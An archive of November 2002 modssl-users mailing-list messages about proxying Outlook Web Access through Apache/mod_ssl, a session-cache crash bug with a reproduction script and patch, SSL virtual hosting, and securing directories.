Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Oops, I made a big mistake!

I'd suggest that you disable *anonymous* access as well, once it all works.

This does mean that users would have to enter their username and password
twice, but does keep out worms like "Code Red". After all, your exchange
server isn't a public site.

On Exchange 5.5/IIS4 we've disabled both Challenge/Response (as this
prevents Netscape or Mozilla getting into your mailbox) and *anonymous*
access. We do get a niggly message "your password will expire in 0 days",
but we just ignore it.

If you followed my last message, you'd never get in. Doh!

- 
John Airey, BSc (Jt Hons), CNA, RHCE
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

If we could learn one thing from September 11th 2001, it would be the utter
absurdity of moral relativism.



> -----Original Message-----
> From: David Marshall [mailto:dmarshall@esilicon.com]
> Sent: 07 November 2002 14:58
> To: modssl-users@modssl.org
> Subject: RE: Is anyone successfully running OWA2K behind 
> Apache/mod_ssl?
> 
> 
> Jason,
> 
> I had this running on RedHat 7.2. Apache 1.3.22/Mod_SSL
> 
> Here are the steps...
> 1. Obtain Apache Mod mod_proxy_add_forward.c
>    Modify the code to set the header "font-end-https: on".
> 
>    add the following
> 
>    /* turn on front-end-https header, so OWA will put HTTPS 
> into urls */ 
>    ap_table_set(r->headers_in, "front-end-https","on");
> 
>    Compile and install mod_proxy_add_forward.c. 
>    I used command "apxs -i -c mod_proxy_add_forward.c" 
>   
> 2. Add a line to your httpd.conf file: 
>    "LoadModule proxy_add_forward_module 
> /usr/lib/apache/1.3/mod_proxy_add_forward.so" 
>     replacing /usr/lib/apache/1.3 with the path that apxs 
> installs the module.
> 
> 3. Add the following directives to the virtual host section 
> of your apache
>    configuration files, replacing FQDN with the fully 
> qualified domain name you
>    want to use, NOT the address of the exchange server:
>     ProxyPass /exchange/ http://FQDN/exchange/
>     ProxyPass /public/ http://FQDN/public/
>     ProxyPass /exchweb/ http://FQDN/exchweb/
> 
> 4. Make sure that external dns resolves the FQDN to the 
> Apache proxy server
> 
> 5. Modify your /etc/hosts on the Apache proxy server
>    Add the FQDN to resolve to the ip address of the OWA server 
> 
> 6. On the Server where OWA is installed, Turn off Windows 
> Integrated Authentication
>    run Internet Services Manager 
>    ( "Programs"->"Administrative Tools"->"Internet Services Manager" )
> 
>    Expand to your OWA website and Right-click the OWA site and select 
>    "Properties", on the resulting Dialog, select the 
> "Directory Security" 
>    Tab, Then Edit the "Anonymous access and authentication control", 
>    remove "Windows Integrated Authentication" and turn on 
> "Basic Authentication"
> 
>    note: you must repeat this step every time you restart IIS 
> or reboot this machine.
> 
> I must tell that although the solution "worked", we did not 
> put this solution into production. 
> 
> The biggest drawbacks to this solution were.
> a. Every time you reboot/restart IIS on the System where OWA 
> is installed, 
>    your security settings will be reset adding "Windows 
> Integrated Authentication" 
>    back to the virtual directories. 
> 
>    We have found no way to resolve this.
> 
> b. We had to add a virtual host for every OWA site on Apache 
> that we needed to host.
>    In my environment we have 3 exchange servers and 2 routing groups. 
>    This meant that as we changed our Exchange Topology, that 
> we would have
>    to re-work the Apache front-end proxy.
> 
> c. Users cannot use the password change option.
> 
> After reading the Microsoft Exchange Front-End/Backend 
> documents 
http://www.microsoft.com/downloads/release.asp?releaseid=43997 , We decided
to evaluate running a Front-End OWA server under SSL with HTTP disabled on a
separate system from the other Exchange Servers. In the final analysis, we
decided that this was the right answer for us.

David Marshall


-----Original Message-----
From: Jason Haar [mailto:Jason.Haar@trimble.co.nz]
Sent: Thursday, November 07, 2002 12:04 AM
To: modssl-users@modssl.org
Subject: Is anyone successfully runnin OWA2K behind Apache/mod_ssl?


We're using Apache/mod_ssl to provide a reverse-proxy to some backend Web
servers, and want to add OWA2K to the list (that's Outlook Web Access for
Microsoft Exchange 2000).

It works fine with OWA from Exchange 5.5 - which was basically just HTML
plus some javascript - but OWA2K (under IE5+) uses all sorts of whizzy M$
stuff, and doesn't work!

If you access OWA2K with a non-IE browser (e.g. Mozilla), OWA2K reverts to
the older format and works fine - it just doesn't work well from IE (ironic
isn't it :-)

It's pretty flakey. IE5.0 works pretty well, IE5.5 works 20% of the time and
IE6 just dies. It goes without saying that all these browsers work fine when
talking directly to the OWA2K server: it's only via the RP that they fail.

I've done packet sniffs and compares and can't see anything out of the
ordinary. I think it's an OWA issue, or an IE security-context issue, but
can't say for sure.

Anyone else got any stories about this?

Thanks

-- 
Cheers

Jason Haar
Information Security Manager, Trimble Navigation Ltd.
Phone: +64 3 9635 377 Fax: +64 3 9635 417
PGP Fingerprint: 7A2E 0407 C9A6 CAF6 2B9F 8422 C063 5EBB FE1D 66D1
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Nov  8 16:43:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA04519; Fri, 8 Nov 2002 16:42:10 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id QAA04491; Fri, 8 Nov 2002 16:41:07 +0100 (MET)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 7A38D4CE731; Fri,  8 Nov 2002 16:41:10 +0100 (CET)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id D7B892869A; Fri,  8 Nov 2002 16:39:42 +0100 (CET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from gw.sysprog.spb.ru id QAA04290; Fri, 8 Nov 2002 16:26:23 +0100 (MET)
Received: from satori (satori.sysprog.spb.ru [195.239.136.17])
	by gw.sysprog.spb.ru (8.12.2/8.12.2) with SMTP id gA8FfQic005780
	for ; Fri, 8 Nov 2002 18:41:27 +0300 (MSK)
	(envelope-from shq@sysprog.spb.ru)
X-Authentication-Warning: gw.sysprog.spb.ru: Host satori.sysprog.spb.ru [195.239.136.17] claimed to be satori
From: "Kirill Shirokov" 
To: 
Subject: A bug in table_adjust function that causes a core dump
Date: Fri, 8 Nov 2002 18:26:20 +0300
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="koi8-r"
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Importance: Normal
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id QAA04293
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Kirill Shirokov" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi folks,

I have found a bug in table_adjust function, and I haven't seen any reports about this error in the mailing list. Also, this error is not fixed in the current version of mod_ssl (2.8.12).

THE BUG
-------------

ssl_util_table.c file, line 1755:

    buckets = (table_entry_t **) table_p->ta_calloc(buck_n, sizeof(table_entry_t *));
    if (table_p->ta_buckets == NULL)
        return TABLE_ERROR_ALLOC;

buckets variable is not checked here and this causes a coredump when the table size is big and there is no memory for reallocating the buckets. Below is a stack dump from Solaris 8 running Apache 1.3.26 + mod_ssl 2.8.10 + OpenSSL 0.9.6g:

...
 --- called from signal handler with signal 11 (SIGSEGV) ---
00089b60 table_adjust (0, fe0a09cc, fe09ea84, 0, 3e9, fe08cdd8) + d0
00081cac ssl_scache_shmht_expire (1, 20, fe0e436c, 4, 31, fe08e438) + 130
00081a24 ssl_scache_shmht_store (94, 18aef0, 20, bb8200, bb81b8, 1ad4e0) + 11c
0007b7e0 ssl_callback_NewSessionCacheEntry (bb8200, 3dc42bfb, 7b784, 1ad4e0, bb81b8, ba65e0) + 5c
fe64c584 ssl_update_cache (a1c458, 2, 21c1, 1ad4e0, 1, a1c458) + a8
fe63ef14 ssl3_accept (a1c458, 2100, 21c0, 3004, 90, 0) + 8c8
fe64d520 SSL_accept (a1c458, fe63e64c, 1, ba1088, 10, ba109a) + 24
fe648d94 ssl23_get_client_hello (2a, 70, 2, ffbef100, 1, a1c458) + 7cc
fe648528 ssl23_accept (a1c458, fe648388, 1a1f70, 0, 6f757400, 6f757400) + 1a0
fe64d520 SSL_accept (a1c458, 79d30, 12c, 0, 16fab0, 17cee0) + 24
00079730 ssl_hook_NewConnection (908cc0, 178000, 1781d0, ffbef2cc, 16fa34, 806478) + 2b4
0004c4a0 new_connection (163b1c, 45415049, 908cc0, ffbef344, ffbef344, 3) + 114
0004d470 child_main (173400, 173400, 173400, ff36b228, ff365958, ff35efb8) + 634
...

HOW TO REPRODUCE
----------------------------------

I was able to reproduce the error in the following way:

1. Set SSLSessionCacheTimeout to 20 minutes
2. Set SSLSessionCache size to 1024000 (or a value that is close to your EAPI_MM_CORE_MAXSIZE).
3. Set ExtendedStatus to On
4. Start the server and run a script like the following one:

#!/usr/local/bin/bash

i=0
while expr $i \< 400 >/dev/null; do
    echo $i
    i=`expr $i + 1`

    for j in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15; do
        curl -I https://your.host/ &
    done
    sleep 1
done

BTW, you may interrupt the script when the "current sessions" parameter at the bottom of the server status page (https://your.host/server-status) have stopped growing.

5. Wait 25 minutes from the time you have started the script and reload the server status page or access the server over SSL. Most likely you will see a core dump.

THE FIX
------------

If we change the if statement like this:..

    if (table_p->ta_buckets == NULL || buckets == NULL)
        return TABLE_ERROR_ALLOC;

...the server doesn't dump core in the test.

Another solution to this problem is to decrease shared memory size in the config file.

Best regards,
Kirill Shirokov,
St. Petersburg, Russia.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Nov  8 19:35:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA11773; Fri, 8 Nov 2002 19:34:13 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.allinterior.com id TAA11769; Fri, 8 Nov 2002 19:34:01 +0100 (MET)
Received: from icarrion (h-64-105-192-205.MIATFLAD.covad.net [64.105.192.205])
	by mail.allinterior.com (Postfix) with ESMTP id E06EC1DB3EE
	for ; Fri,  8 Nov 2002 13:08:20 -0500 (EST)
From: "Irving Carrion" 
To: 
Subject: mod-ssl Virtual Hosts
Date: Fri, 8 Nov 2002 13:30:55 -0500
Organization: All Interior Supply
Message-ID: <021d01c28754$f9d7d770$820000c0@icarrion>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.2627
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Irving Carrion" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello All!

Just recently I was able to get this mod-ssl library working on Apache.
It is working just fine.  Much thanks to the developer team.

Anyway my question is...

Currently I use name-based virtual hosts for all of our websites.

http://domain1.com
http://domain2.com

We would like to have the ability to get each domain a https address as
well like...

https://domain1.com
https://domain2.com

What would be the best method of tackling this, since mod-ssl doesn't
support name-based virtual host?

I've thought of using IP Based virtual host, but there isn't enough
static ip's to go around.  I've also thought of using
proxypass/proxyreverse to point it to an internal static ip.  Am I on
target with this?

I would really appreciate any help or suggestions ANYONE can provide.

Thanks!
IRV




______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Nov  8 20:06:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA12655; Fri, 8 Nov 2002 20:05:13 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from deeproot.co.in id UAA12644; Fri, 8 Nov 2002 20:04:32 +0100 (MET)
Received: (qmail 1367 invoked from network); 9 Nov 2002 00:15:54 -0000
Received: from unknown (HELO 172.16.1.5) (info@deeproot.co.in@202.62.83.74)
  by 0 with SMTP; 9 Nov 2002 00:15:54 -0000
Received: (qmail 10042 invoked by uid 0); 9 Nov 2002 00:37:28 -0000
Received: from unknown (HELO anokha) (192.168.1.8)
  by 0 with SMTP; 9 Nov 2002 00:37:28 -0000
Date: Sat, 9 Nov 2002 00:04:13 +0530 (IST)
From: Avinash S 
X-X-Sender: avinash@anokha.lan.deeproot.co.in
To: "modssl-users@modssl.org" 
Subject: Segmentaion faults
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Avinash S 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Hi,

I am using Red Hat 7.3 with apache-1.3.26, mod_ssl-2.8.7-4 and
openssl-0.9.6b-18. Apache has crashed three times in last week with the
following error in apache's error_log.

[Mon Nov  4 15:58:07 2002] [error] [client 147.213.65.178] client sent
HTTP/1.1 request without hostname (see RFC2616 section 14.23): /
[Mon Nov  4 15:58:16 2002] [error] mod_ssl: SSL handshake failed (server
www.nonstock.com:443, client 147.213.65.178) (OpenSSL library error
follows)
[Mon Nov  4 15:58:16 2002] [error] OpenSSL:
error:1406908F:lib(20):func(105):reason(143)
[Mon Nov  4 15:58:17 2002] [notice] child pid 14246 exit signal
Segmentation fault (11)

Please help.

Thanks in advance
Avinash.



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Nov  8 20:07:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA12672; Fri, 8 Nov 2002 20:06:10 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.databuilt.com id UAA12654; Fri, 8 Nov 2002 20:05:09 +0100 (MET)
Received: from hh-nts01.databuilt.com ([12.111.128.215])
	by mail.databuilt.com (8.10.2/8.10.2) with ESMTP id gA8J4vS13260
	for ; Fri, 8 Nov 2002 14:04:57 -0500
Received: from hh-nts01.databuilt.com ([192.168.1.9]) by hh-nts01.databuilt.com with Microsoft SMTPSVC(5.0.2195.5329);
	 Fri, 8 Nov 2002 14:04:59 -0500
Received: FROM w3works.com BY hh-nts01.databuilt.com ; Fri Nov 08 14:04:58 2002 -0500
Date: Fri, 8 Nov 2002 19:04:57 +0000
Subject: Re: mod-ssl Virtual Hosts
Content-Type: text/plain; charset=US-ASCII; format=flowed
Mime-Version: 1.0 (Apple Message framework v546)
From: Dave Paris 
To: modssl-users@modssl.org
Content-Transfer-Encoding: 7bit
In-Reply-To: <021d01c28754$f9d7d770$820000c0@icarrion>
Message-Id: 
X-Mailer: Apple Mail (2.546)
X-OriginalArrivalTime: 08 Nov 2002 19:04:59.0730 (UTC) FILETIME=[BC17A320:01C28759]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Dave Paris 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

a) you could try surfing the archives of this list since an arguable 
10% of the traffic is either this exact question or directly relates to 
it.
b) you could use different ports
c) you could use different IPs.  they're not *that* rare .. and .. it 
could be sanely argued that if you've got content important enough to 
protect using SSL, the cost of "using up" an IP is just part of the 
cost of making that _important_ information accessible.

-dsp


On Friday, Nov 8, 2002, at 18:30 Europe/London, Irving Carrion wrote:

> Hello All!
>
> Just recently I was able to get this mod-ssl library working on Apache.
> It is working just fine.  Much thanks to the developer team.
>
> Anyway my question is...
>
> Currently I use name-based virtual hosts for all of our websites.
>
> http://domain1.com
> http://domain2.com
>
> We would like to have the ability to get each domain a https address as
> well like...
>
> https://domain1.com
> https://domain2.com
>
> What would be the best method of tackling this, since mod-ssl doesn't
> support name-based virtual host?
>
> I've thought of using IP Based virtual host, but there isn't enough
> static ip's to go around.  I've also thought of using
> proxypass/proxyreverse to point it to an internal static ip.  Am I on
> target with this?
>
> I would really appreciate any help or suggestions ANYONE can provide.
>
> Thanks!
> IRV
>
>
>
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Nov  8 20:16:20 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA13339; Fri, 8 Nov 2002 20:14:16 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from SOTTMXS01.entrust.com id UAA13316; Fri, 8 Nov 2002 20:13:28 +0100 (MET)
Received: by sottmxs01.entrust.com with Internet Mail Service (5.5.2656.59)
	id ; Fri, 8 Nov 2002 14:13:21 -0500
Message-ID: 
From: Robert Lagana 
To: "'modssl-users@modssl.org'" 
Subject: Securing directories
Date: Fri, 8 Nov 2002 14:13:20 -0500 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2656.59)
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C2875A.E6841F20"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Robert Lagana 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C2875A.E6841F20
Content-Type: text/plain;
	charset="iso-8859-1"

Hello,
 
Using mod_ssl .. on Apache .. I would like to secure two directories..
 
https://www.domain.com/homedir  
 
https://www.domain.com/homedir2  
 
Now if user go to http://www.domain.com   will users
get a pop up saying that SSL is required?
 
Is this just a matter of having Port 80 and Port 443 enabled?
 
Do I set these directories up as virtual hosts?
 
Is there a link someone can provided that explains this?
 
Thanks,
Rob
 
 

------_=_NextPart_001_01C2875A.E6841F20
Content-Type: text/html;
	charset="iso-8859-1"









Hello,


 


Using mod_ssl .. on 
Apache .. I would like to secure two directories..


 



 



 


Now if user go to http://www.domain.com will users get a pop up 
saying that SSL is required?


 


Is this just a 
matter of having Port 80 and Port 443 enabled?


 


Do I set these 
directories up as virtual hosts?


 


Is there a link 
someone can provided that explains this?


 


Thanks,


Rob


 


 


------_=_NextPart_001_01C2875A.E6841F20--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Nov  8 20:46:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA14439; Fri, 8 Nov 2002 20:45:30 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mhro1.mayo.edu id UAA14370; Fri, 8 Nov 2002 20:44:47 +0100 (MET)
Received: from fermat.mayo.edu by mhro1.mayo.edu with ESMTP for modssl-users@modssl.org; Fri, 8 Nov 2002 13:44:39 -0600
Received: from feynmanjr.mayo.edu (feynmanjr.mayo.edu [129.176.212.169])
	by fermat.mayo.edu (8.8.8+Sun/8.8.8) with ESMTP id NAA25719
	for ; Fri, 8 Nov 2002 13:45:27 -0600 (CST)
Date: Fri, 8 Nov 2002 13:44:39 -0600 (CST)
From: Paul Bleimeyer 
To: "'modssl-users@modssl.org'" 
Subject: Re: Securing directories
In-Reply-To: 
Message-Id: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Paul Bleimeyer 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Rob,

You might want to use a restricted realm setup and use the 
authnname and setup a number of users to control the access.
Part I: Restricting access.
Using a authorization file on the folder in question is also
possible, but if your users create subfolders, then they will
be prompted to reauthenticate as they traverse the subfolders.

Using the Authusername might be easier. 

Part II: Secure vs. unsecure connections:
If you have both 80 and 443 bound to each of these 
virtual websites, then users will be able to connect on each
port. Inserting the access controls mentioned at the top will
work across both. If you want to insure that users are not able
to open this connection via 80, then do not include this 
port in your listen statements in http.conf.

There are many different ways to deal with this. See the following
for more details.

Binding ports and the listen option:
http://httpd.apache.org/docs-2.0/bind.html

Authentication overview.
http://httpd.apache.org/docs-2.0/howto/auth.html

Users via a password file:
http://httpd.apache.org/docs-2.0/howto/auth.html#gettingitworking

Users via a groups file:
http://httpd.apache.org/docs-2.0/howto/auth.html#lettingmorethanonepersonin

On Fri, 8 Nov 2002, Robert Lagana wrote:

> Hello,
i>  
> Using mod_ssl .. on Apache .. I would like to secure two directories..
>  
> https://www.domain.com/homedir  
>  
> https://www.domain.com/homedir2  
>  
> Now if user go to http://www.domain.com   will users
> get a pop up saying that SSL is required?
>  
> Is this just a matter of having Port 80 and Port 443 enabled?
>  
> Do I set these directories up as virtual hosts?
>  
> Is there a link someone can provided that explains this?
>  
> Thanks,
> Rob
>  
>  
> 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Nov  8 20:55:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA14677; Fri, 8 Nov 2002 20:54:21 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from SOTTMXS01.entrust.com id UAA14662; Fri, 8 Nov 2002 20:53:30 +0100 (MET)
Received: by sottmxs01.entrust.com with Internet Mail Service (5.5.2656.59)
	id ; Fri, 8 Nov 2002 14:53:23 -0500
Message-ID: 
From: Robert Lagana 
To: "'modssl-users@modssl.org'" 
Subject: RE: Securing directories
Date: Fri, 8 Nov 2002 14:53:22 -0500 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2656.59)
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C28760.7E257770"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Robert Lagana 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C28760.7E257770
Content-Type: text/plain

Thank you very much Paul.

Regards,
Robert

-----Original Message-----
From: Paul Bleimeyer [mailto:paulb@mayo.edu]
Sent: Friday, November 08, 2002 2:45 PM
To: 'modssl-users@modssl.org'
Subject: Re: Securing directories



Rob,

You might want to use a restricted realm setup and use the 
authnname and setup a number of users to control the access.
Part I: Restricting access.
Using a authorization file on the folder in question is also
possible, but if your users create subfolders, then they will
be prompted to reauthenticate as they traverse the subfolders.

Using the Authusername might be easier. 

Part II: Secure vs. unsecure connections:
If you have both 80 and 443 bound to each of these 
virtual websites, then users will be able to connect on each
port. Inserting the access controls mentioned at the top will
work across both. If you want to insure that users are not able
to open this connection via 80, then do not include this 
port in your listen statements in http.conf.

There are many different ways to deal with this. See the following
for more details.

Binding ports and the listen option:
http://httpd.apache.org/docs-2.0/bind.html

Authentication overview.
http://httpd.apache.org/docs-2.0/howto/auth.html

Users via a password file:
http://httpd.apache.org/docs-2.0/howto/auth.html#gettingitworking

Users via a groups file:
http://httpd.apache.org/docs-2.0/howto/auth.html#lettingmorethanonepersonin

On Fri, 8 Nov 2002, Robert Lagana wrote:

> Hello,
i>  
> Using mod_ssl .. on Apache .. I would like to secure two directories..
>  
> https://www.domain.com/homedir  
>  
> https://www.domain.com/homedir2  
>  
> Now if user go to http://www.domain.com   will
users
> get a pop up saying that SSL is required?
>  
> Is this just a matter of having Port 80 and Port 443 enabled?
>  
> Do I set these directories up as virtual hosts?
>  
> Is there a link someone can provided that explains this?
>  
> Thanks,
> Rob
>  
>  
> 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

------_=_NextPart_001_01C28760.7E257770
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable






RE: Securing directories




Thank you very much Paul.




Regards,

Robert




-----Original Message-----

From: Paul Bleimeyer [mailto:paulb@mayo.edu]

Sent: Friday, November 08, 2002 2:45 PM

To: 'modssl-users@modssl.org'

Subject: Re: Securing directories








Rob,




You might want to use a restricted realm setup and =
use the 

authnname and setup a number of users to control the =
access.

Part I: Restricting access.

Using a authorization file on the folder in question =
is also

possible, but if your users create subfolders, then =
they will

be prompted to reauthenticate as they traverse the =
subfolders.




Using the Authusername might be easier. 




Part II: Secure vs. unsecure connections:

If you have both 80 and 443 bound to each of these =


virtual websites, then users will be able to connect =
on each

port. Inserting the access controls mentioned at the =
top will

work across both. If you want to insure that users =
are not able

to open this connection via 80, then do not include =
this 

port in your listen statements in http.conf.




There are many different ways to deal with this. See =
the following

for more details.




Binding ports and the listen option:

http://httpd.apache.org/docs-2.0/bind.html




Authentication overview.

http://httpd.apache.org/docs-2.0/howto/auth.html




Users via a password file:

http://httpd.apache.org/docs-2.0/howto/auth.html#getti=
ngitworking




Users via a groups file:

http://httpd.apache.org/docs-2.0/howto/auth.html#letti=
ngmorethanonepersonin




On Fri, 8 Nov 2002, Robert Lagana wrote:




> Hello,

i>  

> Using mod_ssl .. on Apache .. I would like to =
secure two directories..



> https://www.domain.com/homedir <https://www.domain.com/homedir> 



> https://www.domain.com/homedir2 <https://www.domain.com/homedir2> 



> Now if user go to http://www.domain.com <http://www.domain.com>  will users

> get a pop up saying that SSL is =
required?



> Is this just a matter of having Port 80 and =
Port 443 enabled?



> Do I set these directories up as virtual =
hosts?



> Is there a link someone can provided that =
explains this?



> Thanks,

> Rob





> 




_______________________________________________________________=
_______

Apache Interface to OpenSSL =
(mod_ssl)          &nb=
sp;        www.modssl.org

User Support Mailing =
List           &n=
bsp;          =
modssl-users@modssl.org

Automated List =
Manager           =
;            =
;     majordomo@modssl.org





------_=_NextPart_001_01C28760.7E257770--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Nov  8 21:05:24 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA15175; Fri, 8 Nov 2002 21:04:20 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mhro1.mayo.edu id VAA15170; Fri, 8 Nov 2002 21:04:02 +0100 (MET)
Received: from fermat.mayo.edu by mhro1.mayo.edu with ESMTP for modssl-users@modssl.org; Fri, 8 Nov 2002 14:03:48 -0600
Received: from feynmanjr.mayo.edu (feynmanjr.mayo.edu [129.176.212.169])
	by fermat.mayo.edu (8.8.8+Sun/8.8.8) with ESMTP id OAA29023
	for ; Fri, 8 Nov 2002 14:04:36 -0600 (CST)
Date: Fri, 8 Nov 2002 14:03:48 -0600 (CST)
From: Paul Bleimeyer 
To: "'modssl-users@modssl.org'" 
Subject: RE: Securing directories
In-Reply-To: 
Message-Id: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Paul Bleimeyer 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Anytime. Thats what this group is all about.
Let us know once you get things rolling.

Regards,

Paul


On Fri, 8 Nov 2002, Robert Lagana wrote:

> Thank you very much Paul.
> 
> Regards,
> Robert
> 
> -----Original Message-----
> From: Paul Bleimeyer [mailto:paulb@mayo.edu]
> Sent: Friday, November 08, 2002 2:45 PM
> To: 'modssl-users@modssl.org'
> Subject: Re: Securing directories
> 
> 
> 
> Rob,
> 
> You might want to use a restricted realm setup and use the 
> authnname and setup a number of users to control the access.
> Part I: Restricting access.
> Using a authorization file on the folder in question is also
> possible, but if your users create subfolders, then they will
> be prompted to reauthenticate as they traverse the subfolders.
> 
> Using the Authusername might be easier. 
> 
> Part II: Secure vs. unsecure connections:
> If you have both 80 and 443 bound to each of these 
> virtual websites, then users will be able to connect on each
> port. Inserting the access controls mentioned at the top will
